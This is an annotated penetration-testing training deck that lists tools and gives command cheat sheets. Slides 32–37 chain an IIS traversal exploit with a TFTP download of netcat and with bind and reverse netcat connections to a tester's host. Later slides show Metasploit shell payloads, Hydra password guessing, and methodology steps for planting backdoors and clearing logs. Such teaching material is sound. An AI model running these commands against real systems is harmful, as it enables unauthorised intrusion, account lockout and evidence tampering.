    Council of Registered Ethical Security Testers (CREST) http://www.crestapproved.com
    TIGER Scheme http://www.tigerscheme.org
    EC-Council's Certified Ethical Hacker (CEH) http://www.eccouncil.org/CEH.htm
    Open Web Application Security Project (OWASP) http://www.owasp.org
  • 13. 1. Vulnerability Scanning
    2. Network Security Assessment
    3. Web Application Testing
    4. Penetration Testing
    5. Onsite Audit
  • 14. Vulnerability Scanning - Uses automated systems (such as Nessus, ISS Internet Scanner, QualysGuard, or eEye Retina) with minimal hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn't provide a clear strategy to improve security.
    Network Security Assessment - An effective blend of automated and hands-on manual vulnerability testing and qualification. The report is usually handwritten, accurate, and concise, giving practical advice that can improve a company's security.
  • 15. Web Application Testing - Involves post-authentication assessment of web application components, identifying command injection, poor permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated.
    Penetration Testing - Involves multiple attack vectors (e.g., telephone war dialing, social engineering, and wireless testing) to compromise the target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.
  • 16. Onsite Audit - Provides the clearest picture of network security. Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.
  • 19. High-level components of Network Assessment:
    1. Network reconnaissance to identify IP networks and hosts of interest.
    2. Bulk network scanning and probing to identify potentially vulnerable hosts.
    3. Investigation of vulnerabilities and further network probing by hand.
    4. Exploitation of vulnerabilities and circumvention of security mechanisms.
  • 20. 1. Information Gathering
    2. Service Enumeration
    3. Vulnerability Identification
    4. Penetration
    5. Maintaining Access
    6. Housekeeping
  • 21. Information Gathering - The objective of information gathering is to find as much information as possible about the target of evaluation, using passive (Google, Whois, WWW) or active (social engineering) information gathering.
    Service Enumeration - Involves launching network and port scanning to find open and filtered ports and the services running on each open port.
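    The "Service Enumeration" step in practice, as an added example that is not part of the slide deck: a full-connect scan of a port list that records open/closed/filtered and grabs the banner each service volunteers, which is the input the next step (vulnerability identification) works from. The two loopback services and their banners are constructed inside the script so it runs offline; `reserve_closed_port` only finds a port nothing listens on. Point `enumerate_services` at a lab host and a real port list to use it for real.

```python
"""Service enumeration: TCP connect + banner grab against a port list.

Added example; it stands in for the 'Service Enumeration' step of the slide's
pen-test methodology. The loopback services and their banners are constructed
here so the script runs offline; they are not captured traffic.
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Constructed banners for the stand-in services (not real hosts).
FAKE_BANNERS = {
    "ftp": b"220 (vsFTPd 3.0.3)\r\n",
    "ssh": b"SSH-2.0-OpenSSH_8.9p1\r\n",
    "smtp": b"220 mail.example.test ESMTP Postfix\r\n",
}


def start_fake_service(banner: bytes) -> int:
    """Start a loopback TCP service that greets every client with `banner`.
    Returns the ephemeral port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # socket torn down at interpreter exit
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def reserve_closed_port() -> int:
    """Pick a loopback port that nothing listens on (bind, read, release)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def grab_banner(host: str, port: int, timeout: float = 2.0, probe: bytes = b"") -> dict:
    """Full TCP connect to host:port and read whatever the service volunteers.

    state: 'open' (handshake completed), 'closed' (RST / connection refused),
    'filtered' (timeout or unreachable, i.e. something is dropping the SYN).
    `probe` is optional bytes to send first, for services that only talk after
    the client does (e.g. b"HEAD / HTTP/1.0\\r\\n\\r\\n" for HTTP).
    """
    result = {"port": port, "state": "closed", "banner": ""}
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            result["state"] = "open"
            if probe:
                s.sendall(probe)
            s.settimeout(timeout)
            try:
                data = s.recv(1024)
            except OSError:          # open but silent service, or reset after accept
                data = b""
            result["banner"] = data.decode("utf-8", "replace").strip()
    except ConnectionRefusedError:
        result["state"] = "closed"
    except OSError:                  # connect timeout, no route, host unreachable
        result["state"] = "filtered"
    return result


def enumerate_services(host: str, ports, workers: int = 32) -> list:
    """Scan `ports` on `host` concurrently; results sorted by port number."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: grab_banner(host, p), ports))
    return sorted(results, key=lambda r: r["port"])


def open_services(host: str, ports) -> list:
    """Only the open ports, each with its banner, ready for the next step
    (vulnerability identification against the product/version seen)."""
    return [r for r in enumerate_services(host, ports) if r["state"] == "open"]


if __name__ == "__main__":
    targets = [start_fake_service(b) for b in FAKE_BANNERS.values()]
    targets.append(reserve_closed_port())
    for r in enumerate_services("127.0.0.1", targets):
        print(f"{r['port']:5d}/tcp {r['state']:8s} {r['banner']}")
```

    A connect scan completes the handshake, so every probe lands in the target's service and connection logs; it trades the stealth of the SYN scan in the Nmap slides for needing no raw-socket privileges. Banners are self-reported and trivially spoofed, so treat them as a lead to qualify by hand, not as proof of the version running.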
  • 22. Vulnerability Identification - Involves finding new and currently known vulnerabilities in the operating systems, applications and/or services (manually or with automated tools).
    Penetration - Involves active penetration of a specific target of evaluation by exploiting any new or known vulnerability.
  • 23. Maintaining Access - Involves uploading a trojan or backdoor so that it is easier to get in and out of the target of evaluation without repeating the exploitation, while making sure the activity is not noticed.
    Housekeeping - Cleaning up to cover tracks. Involves disabling audit settings and clearing or altering log files (system, security and application).
  • 25. Scanning Tools:
    1. Nmap (http://www.insecure.org)
    2. Nessus (http://www.nessus.org)
    3. ISS Internet Scanner (http://www.iss.net)
    4. eEye Retina (http://www.eeye.com)
    5. QualysGuard (http://www.qualys.com)
    6. Matta Colossus (http://www.trustmatta.com)
  • 26. Exploitation Frameworks:
    1. Metasploit Framework (http://www.metasploit.com)
    2. Core IMPACT (http://www.coresecurity.com)
    3. Immunity CANVAS (http://www.immunityinc.com/products-canvas.shtml)
  • 27. Proxy-based web application testing tools:
    1. Paros (http://www.parosproxy.org)
    2. WebScarab (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
    3. Burp Suite (http://portswigger.net)
  • 28. Active web application crawling and fuzzing tools:
    1. Wapiti (http://wapiti.sourceforge.net)
    2. Nikto (http://www.cirt.net/code/nikto.shtml)
  • 29. Web Application Scanning Tools:
    1. Acunetix Web Vulnerability Scanner (http://www.acunetix.com)
    2. Watchfire AppScan (http://www.watchfire.com/products/appscan/)
    3. SPI Dynamics WebInspect (http://www.spidynamics.com/products/webinspect/)
    4. Cenzic Hailstorm (http://www.cenzic.com/products_services/cenzic_hailstorm.php)
  • 30. Useful Websites:
    1. Securiteam (http://www.securiteam.com)
    2. SecurityFocus (http://www.securityfocus.com)
    3. milw0rm (http://www.milw0rm.com)
    4. Offensive Security Exploit DB (http://www.exploit-db.com)
    5. Packet Storm (http://www.packetstormsecurity.org)
    6. FrSIRT (http://www.frsirt.com)
    7. MITRE Corporation CVE (http://cve.mitre.org)
    8. NIST National Vulnerability Database (http://nvd.nist.gov)
    9. ISS X-Force (http://xforce.iss.net)
    10. CERT vulnerability notes (http://www.kb.cert.org/vuls)
    11. eEye Preview (http://research.eeye.com/html/services)
    12. 3Com TippingPoint DVLabs (http://dvlabs.tippingpoint.com)
    13. VeriSign iDefense Security Intelligence Services (http://labs.idefense.com/services)
  • 31. 1. Information Gathering
    2. Service Identification
    3. Vulnerability Identification
    4. Penetration (Exploitation)
    5. Maintaining Access
    6. Housekeeping (Covering Tracks)
    7. Password Cracking
    8. Client-Side Hacking
    9. Web Application Hacking
    10. Denial-of-Service (DoS) Attacks
    11. Sniffing and ARP Spoofing
    12. Wireless Hacking
    13. Linux Hacking
    14. Analyzing Attack Signatures with IDS and Sniffer
    15. Evading IDS and Firewall
  • 32. IIS Unicode Directory Traversal Exploit
    Syntax: nc -v <target_ip> <http_port>
            GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>
    Example: nc -v 131.107.1.101 80
             GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
    Note: the ..%255c.. string in the example is the double-decode ("superfluous decoding", MS01-026) form of the traversal: IIS decodes %25 to % once, passes the path check, and then decodes the resulting %5c to a backslash a second time. The original Unicode traversal (MS00-078) used overlong UTF-8 such as ..%c0%af.. instead. Both are fixed by the corresponding Microsoft patches, so this only works against an unpatched IIS 4.0/5.0 with the /scripts virtual directory still mapped.
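    Why the request on this slide got past the server's own path check, shown from the defender's side as an added example that is not part of the slide deck: a check that percent-decodes once and then looks for `..` misses both the double-encoded `..%255c..` and the overlong `..%c0%af..`, while a check that decodes to a fixed point and accepts overlong 2-byte UTF-8 the way the vulnerable IIS decoder did catches both. The log lines are constructed in IIS W3C style (the first carries the slide's own request); `lenient_utf8` reproduces only the overlong 2-byte case, which is all these requests need.

```python
"""Detecting the slide's traversal request after decoding the way IIS did.

Added example (not from the slide deck). The log lines are constructed in IIS
W3C style; the request in the first line is the one the slide builds.
"""
import re
from urllib.parse import unquote, unquote_to_bytes

IIS_LOG_LINES = [  # constructed: date time client method uri-stem uri-query status
    "2001-05-01 10:01:02 131.107.1.252 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200",
    "2001-05-01 10:01:05 131.107.1.252 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404",
    "2001-05-01 10:01:09 131.107.1.252 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200",
    "2001-05-01 10:02:00 10.0.0.7 GET /default.htm - 200",
    "2001-05-01 10:02:03 10.0.0.7 GET /scripts/report..old.asp ?id=7 200",
]

# A '..' path segment: '..' bounded by separators (or the string ends).
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def lenient_utf8(raw: bytes) -> str:
    """Decode UTF-8 but, like the pre-MS00-078 IIS decoder, accept overlong
    2-byte encodings (lead byte 0xC0/0xC1) that strict decoders reject:
    b'\\xc0\\xaf' -> '/', b'\\xc1\\x9c' -> '\\'."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("utf-8", "replace")


def naive_is_traversal(path: str) -> bool:
    """One strict percent-decode, then look for '..': the check that both
    '..%255c..' (double-encoded) and '..%c0%af..' (overlong) slip past."""
    return bool(TRAVERSAL.search(unquote(path, errors="replace")))


def canonical_is_traversal(path: str, max_rounds: int = 4) -> bool:
    """Decode to a fixed point, honouring overlong UTF-8 at each round, then
    normalise '\\' to '/' and look for a '..' segment. The round limit stops
    hostile input from keeping us decoding indefinitely."""
    cur = path
    for _ in range(max_rounds):
        nxt = lenient_utf8(unquote_to_bytes(cur))
        if nxt == cur:
            break
        cur = nxt
    return bool(TRAVERSAL.search(cur.replace("\\", "/")))


def flag_traversal(log_lines) -> list:
    """Return (client, uri) for every W3C-style line whose URI is a traversal
    once canonicalised. Malformed lines are skipped rather than raising."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        client, uri = fields[2], fields[4]
        if canonical_is_traversal(uri):
            hits.append((client, uri))
    return hits


if __name__ == "__main__":
    for client, uri in flag_traversal(IIS_LOG_LINES):
        print(f"{client} -> {uri}  (naive check says: {naive_is_traversal(uri)})")
```

    The same rule applies when reviewing your own handlers: decode completely and canonicalise first, then authorise; any check that runs between two decoding steps can be walked around by encoding the payload one layer deeper. The 404 on the single-encoded attempt in the constructed log is the kind of detail worth keeping in a report, since it shows the attacker probing for which encoding the server accepts.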
  • 33. TFTP (Trivial File Transfer Protocol) Upload and Download
    Syntax: tftp -i <tftp_server_ip> GET <file>
            tftp -i <tftp_server_ip> PUT <file>
    Example: tftp -i 131.107.1.252 GET nc.exe
             tftp -i 131.107.1.101 PUT nc.exe
    Unicode Example: GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
    Note: -i selects binary (image) transfer mode, which an executable needs. The GET form runs on the compromised host and pulls nc.exe from a TFTP server on the tester's machine (131.107.1.252), which is why it is the command embedded in the Unicode request; the PUT form pushes a file to a TFTP server running on the target (131.107.1.101). TFTP has no authentication and no encryption, so anything served this way is visible to anyone on the path.
  • 34. Netcat (Network Swiss Army Knife) - Server Mode on the tester's host (listening; receives a reverse TCP connection)
    Syntax: nc -v -l -p <port_to_listen_to>
            nc -vlp <port_to_listen_to>
    Example: nc -v -l -p 555
             nc -vlp 555
  • 35. Netcat (Network Swiss Army Knife) - Client Mode on the tester's host (connecting to a bind TCP listener on the target)
    Syntax: nc -v <target_ip> <target_port>
    Example: nc -v 131.107.1.101 555
  • 36. Netcat (Network Swiss Army Knife) - Server Mode on the target (listening; bind TCP), started through the IIS traversal
    Syntax: nc -v -l -p <listening_port>
    Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>
    Example: GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555
    The tester then connects with the slide 35 client to the port this listener was started on (5555 in this example).
  • 37. Netcat (Network Swiss Army Knife) - Client Mode on the target (connecting back; reverse TCP), started through the IIS traversal
    Syntax: nc -v <tester_ip> <listening_port>
    Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>
    Example: GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+131.107.1.252+555
    This connects back to the slide 34 listener on 131.107.1.252:555. Outbound connections from a server are usually filtered less strictly than inbound ones, which is why the reverse form generally succeeds where the bind form is blocked.
    Note: as written, none of these commands attaches a shell to the connection; that needs netcat's -e option (for example -e cmd.exe) on the side that runs on the target, and nc.exe must already be on the target (see slide 33). The request-line form used here is the HTTP absolute-URI form; the web server treats everything after cmd.exe? as the query string, with + standing for spaces.
  • 38. Nmap (Ping Sweep/Network Scan)
    Syntax: nmap -sP <network_id>
    Example: nmap -sP 131.107.1.0/24
    Nmap (Port Scan)
    Syntax: nmap <target_ip>
    Example: nmap 131.107.1.101
    Note: current Nmap spells the ping sweep -sn; -sP is still accepted as a legacy alias. A plain nmap <target_ip> scans the 1000 most common TCP ports, not all 65535 (use -p- for that).
  • 39. Nmap (Port Scan with Options)
    Syntax: nmap <option> <target_ip>
    Examples: nmap -sS -sV -O 131.107.1.101
              nmap -sS -sV -p80,443 -O 131.107.1.101
              nmap -sS -sV -p80,443 -O -T4 131.107.1.101
              nmap -sS -sV -p80,443 -O -T4 -PN 131.107.1.101
              nmap -sU -sV -O 131.107.1.101
              nmap -A 131.107.1.101
    Note: -sS (SYN scan), -sU (UDP scan) and -O (OS detection) need raw-socket privileges (root/Administrator); without them Nmap falls back to a connect scan. -PN (skip host discovery, for targets that drop ping) is now written -Pn. -A bundles -sV, -O, default scripts and traceroute and is the noisiest of these.
  • 40. Nmap (Enumeration)
    Syntax: nmap <option> --script=<script> <target_ip>
    Examples: nmap -sS --script=smb-enum-users 131.107.1.101
              nmap -sS --script=smb-enum-shares 131.107.1.101
              nmap -sS --script=smb-enum-domains 131.107.1.101
              nmap -sS --script=smb-enum-processes 131.107.1.101
              nmap -sS --script=smb-enum-security 131.107.1.101
    Note: the option is --script (two dashes). The SMB scripts need TCP 445 (or 139) open and, on systems that refuse null sessions, credentials passed with --script-args smbusername=...,smbpassword=... . Script names change between releases, so check ls /usr/share/nmap/scripts/smb-enum* before relying on one (for instance, current releases ship smb-security-mode rather than smb-enum-security).
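    What to do with the scan output once it exists, as an added example that is not part of the slide deck: the Nmap slides above produce the host and service list, and the Hydra slide further on consumes it one host at a time. This script parses `nmap -oX` output and emits the Hydra command lines for every open service Hydra has a module for, with the nmap-service-name to Hydra-module mapping stated explicitly. The XML is constructed to follow the -oX schema (nmaprun/host/ports/port/state/service); the hosts, products and versions in it are invented.

```python
"""Turn `nmap -oX` output into a target list for the later steps.

Added example, not from the slide deck. The XML below is constructed to follow
the nmap -oX schema; the hosts, products and versions in it are invented.
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -oX scan.xml 131.107.1.0/24">
 <host><status state="up"/>
  <address addr="131.107.1.101" addrtype="ipv4"/>
  <hostnames><hostname name="web01.example.test" type="PTR"/></hostnames>
  <ports>
   <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="Microsoft ftpd"/></port>
   <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Microsoft IIS httpd" version="5.0"/></port>
   <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
   <port protocol="tcp" portid="445"><state state="filtered"/><service name="microsoft-ds"/></port>
  </ports>
 </host>
 <host><status state="up"/>
  <address addr="131.107.1.102" addrtype="ipv4"/>
  <ports>
   <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="7.4"/></port>
   <port protocol="tcp" portid="1433"><state state="closed"/><service name="ms-sql-s"/></port>
  </ports>
 </host>
 <host><status state="down"/><address addr="131.107.1.103" addrtype="ipv4"/></host>
</nmaprun>
"""

# nmap service name -> (THC Hydra module, the port Hydra assumes for it).
HYDRA_MODULES = {
    "ftp": ("ftp", 21),
    "ssh": ("ssh", 22),
    "microsoft-ds": ("smb", 445),
    "ms-sql-s": ("mssql", 1433),
}


def parse_nmap_xml(xml_text: str) -> list:
    """Hosts that were up, each with its address, PTR name and port table.
    For XML you did not generate yourself, parse with defusedxml instead."""
    root = ET.fromstring(xml_text)
    hosts = []
    for h in root.iter("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue                                   # skip hosts that never answered
        addr = next((a.get("addr") for a in h.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        name = h.find("hostnames/hostname")
        host = {"addr": addr,
                "hostname": name.get("name") if name is not None else None,
                "ports": []}
        for p in h.findall("ports/port"):
            state = p.find("state")
            svc = p.find("service")
            host["ports"].append({
                "port": int(p.get("portid")),
                "proto": p.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
        hosts.append(host)
    return hosts


def open_ports(hosts: list) -> list:
    """(addr, port, service, 'product version') for every open TCP port."""
    out = []
    for h in hosts:
        for p in h["ports"]:
            if p["state"] == "open" and p["proto"] == "tcp":
                banner = " ".join(x for x in (p["product"], p["version"]) if x)
                out.append((h["addr"], p["port"], p["service"], banner))
    return out


def hydra_commands(hosts: list, users: str = "login.txt", passwords: str = "pass.txt") -> list:
    """One hydra invocation per open service that Hydra has a module for, in
    the form the Hydra slide uses; a non-default port is passed with -s."""
    cmds = []
    for addr, port, service, _ in open_ports(hosts):
        if service not in HYDRA_MODULES:
            continue                                   # e.g. http: not a password-grinding target here
        module, default_port = HYDRA_MODULES[service]
        port_opt = "" if port == default_port else f" -s {port}"
        cmds.append(f"hydra -L {users} -P {passwords}{port_opt} {addr} {module}")
    return cmds


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_NMAP_XML)
    for addr, port, service, banner in open_ports(found):
        print(f"{addr}:{port} {service} {banner}")
    print("\n".join(hydra_commands(found)))
```

    The filtered 445 and the closed 1433 drop out of the target list on purpose: grinding passwords against a port that is not answering only fills the target's logs. Keep the XML file with the engagement notes; it is the evidence behind every finding that starts with "port N was open".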
  • 41. Metasploit Framework Exploit Module (MSFConsole)
    cd /pentest/exploits/msf3
    ./msfconsole
    Syntax: msf > help
            msf > show exploits
            msf > use <exploit_module>
            msf > show payloads
            msf > set PAYLOAD <payload_type>
            msf > show options
            msf > set RHOST <target_ip>
            msf > set LHOST <localhost_ip>
            msf > set LPORT <local_port>
            msf > set RPORT <remote_port>
            msf > show targets
            msf > set TARGET <target_id>
            msf > exploit
  • 42. Metasploit Framework Exploit Module (MSFConsole)
    cd /pentest/exploits/msf3
    ./msfconsole
    Example: msf > help
             msf > show exploits
             msf > use windows/dcerpc/ms03_026_dcom
             msf > show payloads
             msf > set PAYLOAD windows/shell/reverse_tcp
             msf > show options
             msf > set RHOST 131.107.1.101
             msf > set LHOST 131.107.1.252
             msf > set LPORT 5555
             msf > set RPORT 1234
             msf > show targets
             msf > set TARGET 0
             msf > exploit
    Note: /pentest/exploits/msf3 is the BackTrack layout; on current distributions msfconsole is on the PATH. RHOST, LHOST and LPORT are the values that change from engagement to engagement; RPORT for ms03_026_dcom defaults to 135 (the RPC endpoint mapper), so the 1234 here is only a placeholder showing where a non-default port would be set. A reverse_tcp payload requires the target to be able to reach LHOST:LPORT.
  • 43. Metasploit Framework Auxiliary Module
    cd /pentest/exploits/msf3
    ./msfconsole
    Syntax: msf > help
            msf > show auxiliary
            msf > use <auxiliary_module>
            msf > set RHOSTS <target_ip_or_network_id>
            msf > run
  • 44. Metasploit Framework Auxiliary Module
    cd /pentest/exploits/msf3
    ./msfconsole
    Example 1: msf > help
               msf > show auxiliary
               msf > use scanner/smb/smb_version
               msf > set RHOSTS 131.107.1.101
               msf > run
    Example 2: msf > help
               msf > show auxiliary
               msf > use scanner/smb/smb_version
               msf > set RHOSTS 131.107.1.0/24
               msf > run
  • 45. Metasploit Framework Exploit Module (MSFCLI)
    cd /pentest/exploits/msf3
    Syntax: ./msfcli <exploit_module> <payload_type> <options> E
    Example: ./msfcli windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=131.107.1.101 E
    Note: msfcli was removed from the framework in 2015; the equivalent one-liner today is msfconsole -x "use windows/dcerpc/ms03_026_dcom; set PAYLOAD windows/shell/bind_tcp; set RHOST 131.107.1.101; exploit", or the same commands saved in a resource file and run with msfconsole -r <file>.
  • 46. THC Hydra (Dictionary-based Password Cracking)
    cd /tmp
    Syntax: ./hydra -L <users_file> -P <passwords_file> <target_ip> <service_type>
    Examples: ./hydra -L login.txt -P pass.txt 131.107.1.101 ftp
              ./hydra -L login.txt -P pass.txt 131.107.1.101 smb
              ./hydra -L login.txt -P pass.txt 131.107.1.101 mssql
              ./hydra -L login.txt -P pass.txt 131.107.1.101 rpc
    Note: rpc is not a service module in current Hydra releases; list the modules your build supports with hydra -h and use -U <module> for a module's own options. Online guessing against a Windows account lockout policy (which slide 11 enumerates first) will lock accounts out long before the wordlist is exhausted, so check the threshold and lower the parallelism (-t) before running the smb example.
  • 47. Nikto (Web Application Vulnerability Scanner)
    cd /pentest/nikto
    Syntax: ./nikto.pl -host <target_ip>
    Example: ./nikto.pl -host 131.107.1.101